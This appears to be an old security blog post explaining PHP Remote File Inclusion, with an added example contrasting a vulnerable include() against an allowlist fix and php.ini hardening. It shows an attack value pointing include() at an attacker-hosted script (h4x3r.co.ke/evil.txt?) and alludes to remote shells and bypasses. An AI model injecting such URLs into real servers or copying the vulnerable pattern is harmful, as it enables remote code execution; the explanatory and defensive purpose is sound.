I am an Information Risk Consultant and Penetration Tester. I specialize mostly in penetrating secure networks and computer systems, where I simulate an organized professional attack against your organization, after which a detailed report with the weaknesses and exploited vectors is summarized. This will help you gain control over your infrastructure's security and maximize your protection.

Wednesday, November 07, 2007


This attack is also called RFI (Remote File Inclusion). It is where the attacker tries to inject his own PHP code into your PHP application. If an attacker manages this, he can execute any code he wishes on the web server.

In a simple example, if the site uses a parameter such as page=page.html to work out which page should be displayed, the code may look something like this:

$file = $_GET['page']; // The page we wish to display

If this vulnerability is present, the intruder can supply a URL he controls as the page parameter instead of a local file name.


So the vulnerable server will try to execute:

$file = "http://www.h4x3r.co.ke/evil.txt?"; // the value that arrived in $_GET['page']
include($file); // $file is the attacker's script

So the intruder gets this executed. As you can see, the attack script has a .txt extension, but a question mark is appended so that whatever the vulnerable site adds after the parameter is passed along as a query string. Also, a .php extension cannot be used, because the script must not be executed on the attacking machine; it must be served as plain text.
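The pattern above beside a hardened version, as an added example that is not part of the original post: the fix is to never let the request parameter reach include() and instead map it through a fixed allowlist of known pages (the page names, file paths and the php.ini settings shown are assumptions for illustration).

```php
<?php
// Added example (not from the original post): the vulnerable include from the
// post beside a hardened version that resolves the page through an allowlist.
// The page names and file paths are assumptions for illustration.

// VULNERABLE: the request parameter goes straight into include(), so with
// allow_url_include enabled a value such as http://attacker.example/evil.txt?
// is fetched and executed on this server.
function includePageVulnerable(array $get): void
{
    $file = $get['page'];   // attacker-controlled
    include($file);         // remote or local file is executed
}

// HARDENED: map the parameter to a fixed set of known pages; anything else
// gets a 404. No user-controlled string ever reaches include().
const PAGES = [
    'home'    => 'pages/home.php',
    'about'   => 'pages/about.php',
    'contact' => 'pages/contact.php',
];

function resolvePage(?string $page): ?string
{
    // Reject anything that is not exactly a known key: no URLs, no '..',
    // no trailing '?' tricks, no case games.
    if ($page === null || !array_key_exists($page, PAGES)) {
        return null;
    }
    return __DIR__ . '/' . PAGES[$page];
}

function includePageSafe(array $get): void
{
    $path = resolvePage($get['page'] ?? null);
    if ($path === null) {
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    include $path;
}

// Defence in depth: even if a bug creeps back in, remote includes should be
// impossible at the PHP level. In php.ini:
//   allow_url_include = Off   (the default since PHP 5.2)
//   allow_url_fopen   = Off   (if the application does not need it)
```

Checking the web server's access log for page= values that begin with a scheme such as http:// or ftp:// is a cheap way to spot attempts against an application that still uses the vulnerable form.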

This is the basic part of how it is done; you can google for more advanced steps to carry out these attacks, how to bypass restrictions, and other methods such as back-connecting and binding a remote shell on the server. Although this kind of attack is dying out, you will still find it on a lot of servers out there due to careless programming and a lack of security audits on these servers. Admins are also to blame, because they are not aware of how hacks are done and are new to the methods intruders use to pick the locks, jump in and roam around the server.

